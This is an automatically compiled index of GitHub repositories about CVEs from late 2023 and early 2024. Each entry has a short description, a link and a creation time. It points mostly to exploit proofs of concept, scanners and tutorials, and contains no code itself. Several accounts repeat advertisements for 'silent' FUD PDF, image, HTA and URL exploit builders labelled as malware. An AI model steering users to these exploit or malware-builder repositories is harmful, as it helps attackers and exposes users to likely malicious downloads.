**Technical details for CVE-2023-46474** : [Xn2/CVE-2023-46474](https://github.com/Xn2/CVE-2023-46474) create time: 2024-01-11T08:35:18Z

**Time-based SQLi** : [mimiloveexe/CVE-2023-6567-poc](https://github.com/mimiloveexe/CVE-2023-6567-poc) create time: 2024-01-11T05:43:31Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [Maskiow/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Maskiow/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-01-10T20:46:05Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [Maskiow/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Maskiow/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-01-10T20:46:05Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [Maskiow/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Maskiow/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-01-10T20:46:04Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [Maskiow/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Maskiow/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-01-10T20:46:03Z

**Arbitrary File Upload Vulnerability in ROS2 Foxy Fitzroy** : [16yashpatel/CVE-2023-51208](https://github.com/16yashpatel/CVE-2023-51208) create time: 2024-01-10T18:08:37Z

**Insecure Deserialization Vulnerability in ROS2 Foxy Fitzroy** : [16yashpatel/CVE-2023-51204](https://github.com/16yashpatel/CVE-2023-51204) create time: 2024-01-10T17:54:59Z

**OS Command Injection Vulnerability in ROS2 Foxy Fitzroy** : [16yashpatel/CVE-2023-51202](https://github.com/16yashpatel/CVE-2023-51202) create time: 2024-01-10T17:33:19Z

**Information Leakage in ROS2 Foxy Fitzroy via Plaintext Message Transmission** : [16yashpatel/CVE-2023-51201](https://github.com/16yashpatel/CVE-2023-51201) create time: 2024-01-10T16:46:56Z

**no description** : [16yashpatel/CVE-2023-51200](https://github.com/16yashpatel/CVE-2023-51200) create time: 2024-01-10T16:17:59Z

**Buffer Overflow Vulnerability in ROS2 Foxy Fitzroy** : [16yashpatel/CVE-2023-51199](https://github.com/16yashpatel/CVE-2023-51199) create time: 2024-01-10T15:53:14Z

**HTML Injection in Alinto/SOGo Web Client** : [E1tex/CVE-2023-48104](https://github.com/E1tex/CVE-2023-48104) create time: 2024-01-10T15:49:48Z

**Privilege Escalation Vulnerability in ROS2 Foxy Fitzroy** : [16yashpatel/CVE-2023-51198](https://github.com/16yashpatel/CVE-2023-51198) create time: 2024-01-10T15:39:19Z

**Shell Injection Vulnerability in ROS2 Foxy Fitzroy** : [16yashpatel/CVE-2023-51197](https://github.com/16yashpatel/CVE-2023-51197) create time: 2024-01-10T15:25:10Z

**CVE-2023-52251 There is a Remote Code Execution vulnerability provectus/kafka-ui.** : [BobTheShoplifter/CVE-2023-52251-POC](https://github.com/BobTheShoplifter/CVE-2023-52251-POC) create time: 2024-01-06T11:07:36Z

**no description** : [haxpunk1337/CVE-2024](https://github.com/haxpunk1337/CVE-2024) create time: 2024-01-10T14:40:33Z

**CVE-2023-48022 exploit modified from Bishop Fox work** : [0x656565/CVE-2023-48022](https://github.com/0x656565/CVE-2023-48022) create time: 2024-01-10T06:26:01Z

**A short tutorial about how to find and verify FortiOS vulnerablility.** : [awchjimmy/CVE-2023-27997-tutorial](https://github.com/awchjimmy/CVE-2023-27997-tutorial) create time: 2024-01-10T02:36:35Z

**Denial-of-Service PoC | Writeup | Header with CLFS structures | Imhex pattern for .blf extension** : [RomanRybachek/CVE-2023-36900](https://github.com/RomanRybachek/CVE-2023-36900) create time: 2023-11-08T10:39:19Z

**no description** : [Freax13/cve-2023-20573-poc](https://github.com/Freax13/cve-2023-20573-poc) create time: 2023-03-11T15:04:51Z

**PoC for CVE-2022-1388 affecting F5 BIG-IP.** : [nico989/CVE-2022-1388](https://github.com/nico989/CVE-2022-1388) create time: 2024-01-09T19:52:36Z

**no description** : [Sonicrrrr/CVE-2023-51385](https://github.com/Sonicrrrr/CVE-2023-51385) create time: 2024-01-09T15:44:52Z

**no description** : [Sonicrrrr/CVE-2023-51385](https://github.com/Sonicrrrr/CVE-2023-51385) create time: 2024-01-09T09:43:25Z

**no description** : [WinnieZy/CVE-2023-4357](https://github.com/WinnieZy/CVE-2023-4357) create time: 2024-01-09T07:31:29Z

**no description** : [hh-hunter/cve-2023-46604](https://github.com/hh-hunter/cve-2023-46604) create time: 2024-01-09T03:18:19Z

**no description** : [NUDTTAN91/CVE20240109](https://github.com/NUDTTAN91/CVE20240109) create time: 2024-01-09T00:53:24Z

**PoC Script for CVE-2022-36267: Exploits an unauthenticated remote command injection vulnerability in Airspan AirSpot 5410 antenna.** : [0xNslabs/CVE-2022-36267-PoC](https://github.com/0xNslabs/CVE-2022-36267-PoC) create time: 2024-01-08T22:23:57Z

**PoC Script for CVE-2022-36553: Exploits an unauthenticated remote command injection vulnerability in Hytec Inter HWL-2511-SS device.** : [0xNslabs/CVE-2022-36553-PoC](https://github.com/0xNslabs/CVE-2022-36553-PoC) create time: 2024-01-08T21:53:46Z

**simple application with a (unreachable!) CVE-2022-45688 vulnerability** : [scabench/jsonorg-fp1](https://github.com/scabench/jsonorg-fp1) create time: 2023-12-28T23:52:36Z

**no description** : [lluriam19/CVE-2021-4034-Vuln](https://github.com/lluriam19/CVE-2021-4034-Vuln) create time: 2024-01-08T17:15:08Z

**no description** : [chetools/CVE2005](https://github.com/chetools/CVE2005) create time: 2024-01-08T12:55:46Z

**no description** : [NUDTTAN91/CVE20240108](https://github.com/NUDTTAN91/CVE20240108) create time: 2024-01-08T09:02:56Z

**Public disclosure of Ivanti's Avalanche Path Traversal vulnerability** : [JBalanza/CVE-2023-41474](https://github.com/JBalanza/CVE-2023-41474) create time: 2024-01-08T08:21:39Z

**Authentication Bypass Vulnerability Apache OFBiz < 18.12.10.** : [UserConnecting/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz](https://github.com/UserConnecting/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz) create time: 2024-01-08T03:13:43Z

**Vul detection system based on NVD CVEs Jan 2023-onwards** : [mirrr/NVD_Vul_Detection](https://github.com/mirrr/NVD_Vul_Detection) create time: 2024-01-07T23:51:17Z

**no description** : [johnossawy/CVE-2023-42793_POC](https://github.com/johnossawy/CVE-2023-42793_POC) create time: 2024-01-07T22:29:18Z

**MobSF Remote code execution (via CVE-2024-21633)** : [0x33c0unt/CVE-2024-21633](https://github.com/0x33c0unt/CVE-2024-21633) create time: 2024-01-07T21:34:09Z

**no description** : [imhunterand/CVE-2022-1386](https://github.com/imhunterand/CVE-2022-1386) create time: 2024-01-07T17:35:26Z

**no description** : [imhunterand/CVE-2021-42013](https://github.com/imhunterand/CVE-2021-42013) create time: 2024-01-07T15:58:03Z

**no description** : [Freax13/cve-2023-46813-poc](https://github.com/Freax13/cve-2023-46813-poc) create time: 2023-05-29T15:10:43Z

**no description** : [netuseradministrator/CVE-2023-28432](https://github.com/netuseradministrator/CVE-2023-28432) create time: 2024-01-07T12:34:49Z

**no description** : [T81oub/CVE-2020-17086](https://github.com/T81oub/CVE-2020-17086) create time: 2024-01-07T09:58:39Z

**no description** : [hktalent/CVE-2022-21350](https://github.com/hktalent/CVE-2022-21350) create time: 2022-09-28T05:38:15Z

**Time Series Model to Predict CVEs for 2024** : [yamineesh-k/cve_prediction_timeseries](https://github.com/yamineesh-k/cve_prediction_timeseries) create time: 2024-01-07T07:48:02Z

**no description** : [srinathkarli7/CVE-2023-26035-exploit.sh.sh.sh](https://github.com/srinathkarli7/CVE-2023-26035-exploit.sh.sh.sh) create time: 2024-01-07T07:59:47Z

**MS-NRPC (Microsoft NetLogon Remote Protocol)/CVE-2020-1472** : [logg-1/0logon](https://github.com/logg-1/0logon) create time: 2024-01-07T04:27:17Z

**Tentando desesperadamente simular uma cve para o trabalho da disciplina de segurança da pós.** : [JaqueMalman/CVE-2023-33137](https://github.com/JaqueMalman/CVE-2023-33137) create time: 2024-01-06T22:40:19Z

**Local Privilege Escalation (LPE) vulnerability in Polkit - Pwnkit** : [LucasPDiniz/CVE-2021-4034](https://github.com/LucasPDiniz/CVE-2021-4034) create time: 2024-01-06T19:41:41Z

**no description** : [madhavmehndiratta/CVE-2023-27163](https://github.com/madhavmehndiratta/CVE-2023-27163) create time: 2024-01-06T13:16:29Z

**Repository contains description for CVE-2023-31446** : [Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution](https://github.com/Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution) create time: 2024-01-06T12:23:50Z

**Apache Ofbiz CVE-2023-51467 图形化漏洞利用工具** : [JaneMandy/CVE-2023-51467-Exploit](https://github.com/JaneMandy/CVE-2023-51467-Exploit) create time: 2024-01-06T04:07:07Z

**Scan CVE-2018-18778 with Python** : [auk0x01/CVE-2018-18778-Scanner](https://github.com/auk0x01/CVE-2018-18778-Scanner) create time: 2024-01-06T03:13:48Z

**no description** : [webscantest1/CVE-2018-6574](https://github.com/webscantest1/CVE-2018-6574) create time: 2024-01-06T01:17:43Z

**no description** : [Trinadh465/platform_system_netd_AOSP10_r33_CVE-2023-40084](https://github.com/Trinadh465/platform_system_netd_AOSP10_r33_CVE-2023-40084) create time: 2024-01-05T10:20:57Z

**Proof of concept for CVE-2020-11110, for educational purpose only** : [AVE-Stoik/CVE-2020-11110-Proof-of-Concept](https://github.com/AVE-Stoik/CVE-2020-11110-Proof-of-Concept) create time: 2024-01-05T09:51:21Z

**A tool for retrieving login credentials from Netwave IP cameras using a memory dump vulnerability (CVE-2018-17240)** : [Xewdy444/Netgrave](https://github.com/Xewdy444/Netgrave) create time: 2024-01-04T21:44:21Z

**CVE-2023-51764 poc** : [Double-q1015/CVE-2023-51764](https://github.com/Double-q1015/CVE-2023-51764) create time: 2024-01-05T07:07:47Z

**no description** : [christopher-pace/CVE-2023-51073](https://github.com/christopher-pace/CVE-2023-51073) create time: 2024-01-05T05:16:18Z

**CVE-2022-24442: FreeMarker Server-Side Template Injection in JetBrains YouTrack** : [mbadanoiu/CVE-2022-24442](https://github.com/mbadanoiu/CVE-2022-24442) create time: 2024-01-05T00:04:41Z

**Clone from gist** : [timb-machine-mirrors/testanull-CVE-2021-26855_read_poc.txt](https://github.com/timb-machine-mirrors/testanull-CVE-2021-26855_read_poc.txt) create time: 2024-01-04T22:48:21Z

**no description** : [julienbrs/exploit-CVE-2023-3460](https://github.com/julienbrs/exploit-CVE-2023-3460) create time: 2024-01-04T22:43:19Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [Makas235/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Makas235/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-01-04T19:32:56Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [Makas235/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Makas235/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-01-04T19:32:56Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [Makas235/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Makas235/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-01-04T19:32:56Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [Makas235/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Makas235/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-01-04T19:32:56Z

**Script to validate WordPress CVE-2022-21661** : [p4ncontomat3/CVE-2022-21661](https://github.com/p4ncontomat3/CVE-2022-21661) create time: 2024-01-04T15:49:00Z

**A exploit for the CVE-2023-27163 (SSRF) vulnerability in the web application request-baskets (<= v.1.2.1)** : [Rubioo02/CVE-2023-27163](https://github.com/Rubioo02/CVE-2023-27163) create time: 2024-01-04T14:46:13Z

**no description** : [julienbrs/exploit-CVE-2023-6553](https://github.com/julienbrs/exploit-CVE-2023-6553) create time: 2024-01-04T14:33:30Z

**A proof-of-concept for the CVE-2023-27163 (SSRF) vulnerability in the web application request-baskets (<= v.1.2.1)** : [Rubioo02/CVE-2023-27163](https://github.com/Rubioo02/CVE-2023-27163) create time: 2024-01-04T13:57:36Z

**no description** : [Subha-BOO7/Exploit_CVE-2023-51467](https://github.com/Subha-BOO7/Exploit_CVE-2023-51467) create time: 2024-01-04T12:44:43Z

**A Tool For CVE-2023-49070/CVE-2023-51467 Attack** : [D0g3-8Bit/OFBiz-Attack](https://github.com/D0g3-8Bit/OFBiz-Attack) create time: 2024-01-04T12:31:49Z

**touch 生成文件** : [cdxiaodong/CVE-2021-4034-touch](https://github.com/cdxiaodong/CVE-2021-4034-touch) create time: 2024-01-04T07:43:02Z

**no description** : [julienbrs/malicious-exploit-CVE-2023-51385](https://github.com/julienbrs/malicious-exploit-CVE-2023-51385) create time: 2024-01-03T19:08:28Z

**no description** : [julienbrs/exploit-CVE-2023-51385](https://github.com/julienbrs/exploit-CVE-2023-51385) create time: 2024-01-03T18:40:44Z

**no description** : [AngieDF21/cVerano2024](https://github.com/AngieDF21/cVerano2024) create time: 2024-01-03T15:11:26Z

**PoC para (CVE-2017–13156)** : [entediado97/rosa_dex_injetor](https://github.com/entediado97/rosa_dex_injetor) create time: 2024-01-03T12:40:12Z

**exploit poc** : [nvk0x/CVE-2022-1388-exploit](https://github.com/nvk0x/CVE-2022-1388-exploit) create time: 2024-01-03T12:28:06Z

**CVE-2023-48864** : [f3lze3/CVE-2023-48864](https://github.com/f3lze3/CVE-2023-48864) create time: 2024-01-03T12:12:07Z

**CVE-2022-0995 exploit** : [1nzag/CVE-2022-0995](https://github.com/1nzag/CVE-2022-0995) create time: 2024-01-03T11:03:45Z

**CVE-2023-48864** : [f3lze3/CVE-2023-48864](https://github.com/f3lze3/CVE-2023-48864) create time: 2024-01-03T10:09:17Z

**no description** : [uccu99/CVE-2023-51385](https://github.com/uccu99/CVE-2023-51385) create time: 2024-01-03T06:28:34Z

**CVE-2020-11023 PoC for bug bounty.** : [Cybernegro/CVE-2020-11023](https://github.com/Cybernegro/CVE-2020-11023) create time: 2024-01-03T02:35:37Z

**no description** : [codeb0ss/CVE-2024-0190-PoC](https://github.com/codeb0ss/CVE-2024-0190-PoC) create time: 2024-01-02T22:41:35Z

**A simple exploit for CVE-2023-22515** : [CalegariMindSec/Exploit-CVE-2023-22515](https://github.com/CalegariMindSec/Exploit-CVE-2023-22515) create time: 2024-01-02T17:40:24Z

**This repo is a PoC with to exploit CVE-2023-51467 and CVE-2023-49070 preauth RCE vulnerabilities found in Apache OFBiz.** : [jakabakos/Apache-OFBiz-Authentication-Bypass](https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass) create time: 2024-01-02T14:20:10Z

**no description** : [Locj41/demo-cve2021-45105](https://github.com/Locj41/demo-cve2021-45105) create time: 2024-01-02T14:10:54Z

**no description** : [sharathc213/CVE-2023-7173](https://github.com/sharathc213/CVE-2023-7173) create time: 2024-01-02T08:41:10Z

**no description** : [sharathc213/CVE-2023-7172](https://github.com/sharathc213/CVE-2023-7172) create time: 2024-01-02T07:28:25Z

**no description** : [risuxx/CVE-2023-51127](https://github.com/risuxx/CVE-2023-51127) create time: 2024-01-02T02:43:09Z

**no description** : [risuxx/CVE-2023-51126](https://github.com/risuxx/CVE-2023-51126) create time: 2024-01-02T02:31:06Z

**CVE-2023-51385 PoC Exploit** : [WOOOOONG/CVE-2023-51385](https://github.com/WOOOOONG/CVE-2023-51385) create time: 2024-01-02T02:12:35Z

**File Read Arbrtary Exploit for CVE-2023-26360 - Adobe Coldfusion** : [yosef0x01/CVE-2023-26360](https://github.com/yosef0x01/CVE-2023-26360) create time: 2023-12-26T06:26:01Z

**Proof of calc for CVE-2019-6453** : [proofofcalc/cve-2019-6453-poc](https://github.com/proofofcalc/cve-2019-6453-poc) create time: 2019-02-18T08:35:03Z

**no description** : [kiddenta/CVE-2023-6553](https://github.com/kiddenta/CVE-2023-6553) create time: 2024-01-01T16:57:17Z

**The repo contains a precompiled binary which can be run on a Windows machine vulnerable to CVE-2023-28252** : [bkstephen/Compiled-PoC-Binary-For-CVE-2023-28252](https://github.com/bkstephen/Compiled-PoC-Binary-For-CVE-2023-28252) create time: 2024-01-01T15:30:33Z

**POC CVE-2023-48983** : [tristao-marinho/CVE-2023-48983](https://github.com/tristao-marinho/CVE-2023-48983) create time: 2024-01-01T13:19:54Z

**POC CVE-2023-48982** : [tristao-marinho/CVE-2023-48982](https://github.com/tristao-marinho/CVE-2023-48982) create time: 2024-01-01T13:14:49Z

**POC CVE-2023-48981** : [tristao-marinho/CVE-2023-48981](https://github.com/tristao-marinho/CVE-2023-48981) create time: 2024-01-01T13:06:39Z

**A video presentation analysing the technical details, scale and lessons to be learned from the MOVEit CVE-2023=3462(CS50 Introduction to Cyber Security Finale Project)** : [Chinyemba-ck/MOVEit-CVE-2023-34362](https://github.com/Chinyemba-ck/MOVEit-CVE-2023-34362) create time: 2024-01-01T00:55:07Z

**no description** : [jiupta/CVE-2024-0001-EXP](https://github.com/jiupta/CVE-2024-0001-EXP) create time: 2023-12-08T10:01:42Z

**no description** : [g-bald/ptlab-cve-2018-6574](https://github.com/g-bald/ptlab-cve-2018-6574) create time: 2023-12-31T18:16:24Z

**just idea, no cp pls** : [d4op/CVE-2023-51764-POC](https://github.com/d4op/CVE-2023-51764-POC) create time: 2023-12-31T14:33:26Z

**Parallels Desktop privilege escalation - CVE-2023-50226 / ZDI-CAN-21227** : [kn32/parallels-file-move-privesc](https://github.com/kn32/parallels-file-move-privesc) create time: 2023-10-28T10:29:53Z

**Mass CVE-2023-2744** : [pashayogi/CVE-2023-2744](https://github.com/pashayogi/CVE-2023-2744) create time: 2023-12-31T07:27:17Z

**JeecgBoot SQL(CVE-2023-1454)** : [shad0w0sec/CVE-2023-1454-EXP](https://github.com/shad0w0sec/CVE-2023-1454-EXP) create time: 2023-12-31T06:47:01Z

**Exploit for CVE-2023-35813 POC** : [lexy-1/CVE-2023-35813](https://github.com/lexy-1/CVE-2023-35813) create time: 2023-12-31T05:23:09Z

**no description** : [snyk-labs/CVE-2023-50164-POC](https://github.com/snyk-labs/CVE-2023-50164-POC) create time: 2023-12-30T21:37:08Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [RelyDelay/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/RelyDelay/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2023-12-30T19:47:45Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [RelyDelay/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/RelyDelay/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2023-12-30T19:47:45Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [RelyDelay/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/RelyDelay/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2023-12-30T19:47:45Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [RelyDelay/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/RelyDelay/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2023-12-30T19:47:44Z

**CVE-2022-45699 - APSystems ECU-R is vulnerable to command injection in the timezone field** : [0xst4n/APSystems-ECU-R-RCE-Timezone](https://github.com/0xst4n/APSystems-ECU-R-RCE-Timezone) create time: 2022-11-17T14:55:54Z

**Dell dbutil_2_3.sys driver exploit** : [houseofxyz/CVE-2021-21551](https://github.com/houseofxyz/CVE-2021-21551) create time: 2023-12-30T12:23:23Z

**Under Work Please come Back Later** : [SpiralBL0CK/cve2023-44372](https://github.com/SpiralBL0CK/cve2023-44372) create time: 2023-12-30T07:35:28Z

**CVE-2023-35985 reproduction** : [SpiralBL0CK/-CVE-2023-35985](https://github.com/SpiralBL0CK/-CVE-2023-35985) create time: 2023-12-30T06:35:21Z

**Python POC to Exploit CVE-2016-4437 Apache Shiro Deserialization Vulnerability Due to Hardcode Encryption Key** : [pizza-power/CVE-2016-4437](https://github.com/pizza-power/CVE-2016-4437) create time: 2023-12-22T02:26:01Z

**一个验证对CVE-2023-51385** : [power1314520/CVE-2023-51385_test](https://github.com/power1314520/CVE-2023-51385_test) create time: 2023-12-30T01:08:29Z

**Request Baskets vulnerable exploit to Server-Side Request Forgery** : [mathias-mrsn/CVE-2023-27163](https://github.com/mathias-mrsn/CVE-2023-27163) create time: 2023-12-29T21:10:48Z

**no description** : [K3ysTr0K3R/CVE-2023-51467-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-51467-EXPLOIT) create time: 2023-12-29T17:47:54Z

**Apache OfBiz Auth Bypass Scanner for CVE-2023-51467** : [Chocapikk/CVE-2023-51467](https://github.com/Chocapikk/CVE-2023-51467) create time: 2023-12-29T15:01:46Z

**no description** : [hshivhare67/platform_framework_base_android-4.2.2_r1_CVE-2023-40121](https://github.com/hshivhare67/platform_framework_base_android-4.2.2_r1_CVE-2023-40121) create time: 2023-12-29T12:13:45Z

**proof of Concept and Vulnerability Detector for CVE-2023-36845** : [WhiteOwl-Pub/Juniper-PoC-CVE-2023-36845](https://github.com/WhiteOwl-Pub/Juniper-PoC-CVE-2023-36845) create time: 2023-12-29T10:22:59Z

**TeamCity JetBrains PoC (CVE-2023-42793)** : [WhiteOwl-Pub/teamCity-PoC-42793](https://github.com/WhiteOwl-Pub/teamCity-PoC-42793) create time: 2023-12-29T10:14:28Z

**no description** : [solomon12354/CVE-2022-0847-Dirty_Pipe_virus](https://github.com/solomon12354/CVE-2022-0847-Dirty_Pipe_virus) create time: 2023-12-28T16:52:42Z

**Joomla Information disclosure exploit code written in C++.** : [shellvik/CVE-2023-23752](https://github.com/shellvik/CVE-2023-23752) create time: 2023-12-29T08:09:24Z

**no description** : [DARKSTUFF-LAB/-CVE-2022-26134](https://github.com/DARKSTUFF-LAB/-CVE-2022-26134) create time: 2023-12-29T06:51:38Z

**CVE-2023-51385测试POC** : [N0rther/CVE-2023-51385_TT](https://github.com/N0rther/CVE-2023-51385_TT) create time: 2023-12-29T02:31:42Z

**CVE-2023-51467 POC** : [JaneMandy/CVE-2023-51467](https://github.com/JaneMandy/CVE-2023-51467) create time: 2023-12-29T02:25:43Z

**simple application with a (unreachable!) CVE-2022-45688 vulnerability** : [scabench/jsonorg-fp3](https://github.com/scabench/jsonorg-fp3) create time: 2023-12-29T02:01:22Z

**About simple application with a (unreachable!) CVE-2022-45688 vulnerability** : [scabench/jsonorg-fp2](https://github.com/scabench/jsonorg-fp2) create time: 2023-12-29T00:14:20Z

**no description** : [vinnie1717/CVE-2023-46344](https://github.com/vinnie1717/CVE-2023-46344) create time: 2023-12-28T23:29:53Z

**Windows SmartScreen Security Feature Bypass Vulnerability** : [coolman6942o/-EXPLOIT-CVE-2023-36025](https://github.com/coolman6942o/-EXPLOIT-CVE-2023-36025) create time: 2023-12-28T23:29:04Z

**no description** : [vinnie1717/CVE-2023-48974](https://github.com/vinnie1717/CVE-2023-48974) create time: 2023-12-28T23:24:22Z

**no description** : [substing/CVE-2019-11447_reverse_shell_upload](https://github.com/substing/CVE-2019-11447_reverse_shell_upload) create time: 2023-12-28T19:11:09Z

**CVE-2023-51385_test-star-main** : [siyi-star/CVE-2023-51385_test-star-main](https://github.com/siyi-star/CVE-2023-51385_test-star-main) create time: 2023-12-28T16:56:13Z

**CVE-2006-2842 is a powerful scanner for bug bounty hunters and penetration testers to discover vulnerabilities in their web applications.** : [karthi-the-hacker/CVE-2006-2842](https://github.com/karthi-the-hacker/CVE-2006-2842) create time: 2023-12-28T15:17:56Z

**no description** : [stevenlutfi/Cve-2019](https://github.com/stevenlutfi/Cve-2019) create time: 2023-12-28T13:38:52Z

**Proof of Concept for Server Side Request Forgery (SSRF) in request-baskets (V<= v.1.2.1)** : [MasterCode112/CVE-2023-27163](https://github.com/MasterCode112/CVE-2023-27163) create time: 2023-12-28T11:36:37Z

**Welcome to the Metasploit Exploits Repository, your go-to resource for a comprehensive collection of cutting-edge exploits designed for penetration testing and ethical hacking. Developed and maintained by Mohamed Mounir Boudjema, this repository is crafted with a deep understanding of the evolving landscape of cybersecurity.** : [DedSec-47/Metasploit-Exploits-CVE-2023-6710](https://github.com/DedSec-47/Metasploit-Exploits-CVE-2023-6710) create time: 2023-12-25T09:40:31Z

**Exploit for Microsoft SharePoint 2019** : [former-farmer/CVE-2023-24955-PoC](https://github.com/former-farmer/CVE-2023-24955-PoC) create time: 2023-12-28T09:08:47Z

**CVE-2022-22963-poc** : [xmqaq/CVE-2022-22963](https://github.com/xmqaq/CVE-2022-22963) create time: 2023-12-28T06:58:17Z

**no description** : [eeenvik1/CVE-2023-51764](https://github.com/eeenvik1/CVE-2023-51764) create time: 2023-12-28T06:20:13Z

**CVE-2023-25194 Scan** : [YongYe-Security/CVE-2023-25194](https://github.com/YongYe-Security/CVE-2023-25194) create time: 2023-12-28T04:24:02Z

**Custom POC of CVE-2021-22986 by Al1ex@Heptagram** : [huydung26/CVE-2021-22986](https://github.com/huydung26/CVE-2021-22986) create time: 2023-12-28T01:49:24Z

**no description** : [ducnorth2712/CVE-2023-23397](https://github.com/ducnorth2712/CVE-2023-23397) create time: 2023-12-28T02:20:57Z

**jee web project with sanitised log4shell (CVE-2021-44228) vulnerability** : [scabench/l4j-fp1](https://github.com/scabench/l4j-fp1) create time: 2023-12-27T08:49:38Z

**jee web project with log4shell (CVE-2021-44228) vulnerability** : [scabench/l4j-tp1](https://github.com/scabench/l4j-tp1) create time: 2023-12-18T05:07:59Z

**simple application with a CVE-2022-45688 vulnerability** : [scabench/jsonorg-tp1](https://github.com/scabench/jsonorg-tp1) create time: 2023-12-27T22:05:06Z

**no description** : [Annavid/CVE-2020-15780-exploit](https://github.com/Annavid/CVE-2020-15780-exploit) create time: 2023-12-27T21:39:43Z

**Exploit for CVE-2023-26035 affecting ZoneMinder < 1.36.33 and < 1.37.33** : [Faelian/zoneminder_CVE-2023-26035](https://github.com/Faelian/zoneminder_CVE-2023-26035) create time: 2023-12-27T18:44:22Z

**POC +report note** : [kimstars/CVE-2018-17552](https://github.com/kimstars/CVE-2018-17552) create time: 2023-12-27T17:34:03Z

**no description** : [jacknickelson/poc-cve-2023-51385](https://github.com/jacknickelson/poc-cve-2023-51385) create time: 2023-12-26T12:49:56Z

**no description** : [motikan2010/CVE-2023-6553-PoC](https://github.com/motikan2010/CVE-2023-6553-PoC) create time: 2023-12-27T14:14:51Z

**no description** : [hshivhare67/platform_framework_base_AOSP6_r22_CVE-2023-40121](https://github.com/hshivhare67/platform_framework_base_AOSP6_r22_CVE-2023-40121) create time: 2023-12-27T12:19:41Z

**CVE-2023-5360 EXPLOIT** : [angkerithhack001/CVE-2023-5360-PoC](https://github.com/angkerithhack001/CVE-2023-5360-PoC) create time: 2023-12-27T09:32:05Z

**Micro-Star MSI Afterburner 4.6.2.15658 exploit** : [houseofxyz/CVE-2019-16098](https://github.com/houseofxyz/CVE-2019-16098) create time: 2023-12-27T08:51:31Z

**no description** : [zhulin2/testCVE-2023-51385](https://github.com/zhulin2/testCVE-2023-51385) create time: 2023-12-27T07:41:38Z

**no description** : [DDayLuong/CVE-2019-18634](https://github.com/DDayLuong/CVE-2019-18634) create time: 2023-12-27T03:52:49Z

**no description** : [DDayLuong/CVE-2021-3156](https://github.com/DDayLuong/CVE-2021-3156) create time: 2023-12-27T03:52:17Z

**no description** : [WLaoDuo/CVE-2023-51385_poc-windows](https://github.com/WLaoDuo/CVE-2023-51385_poc-windows) create time: 2023-12-27T01:24:01Z

**CrushFTP <= 10.5.1 Remote Code Execution. Researchers: Ryan Emmons, Evan Malamis** : [the-emmons/CVE-2023-43177](https://github.com/the-emmons/CVE-2023-43177) create time: 2023-12-27T00:06:20Z

**This is a exploit of CVE-2021-32305 a web vulnerability to command injection on search.php path, this exploit allows execute commands.** : [FredBrave/CVE-2021-32305-websvn-2.6.0](https://github.com/FredBrave/CVE-2021-32305-websvn-2.6.0) create time: 2023-12-26T20:20:00Z

**no description** : [Faelian/CraftCMS_CVE-2023-41892](https://github.com/Faelian/CraftCMS_CVE-2023-41892) create time: 2023-12-26T18:31:27Z

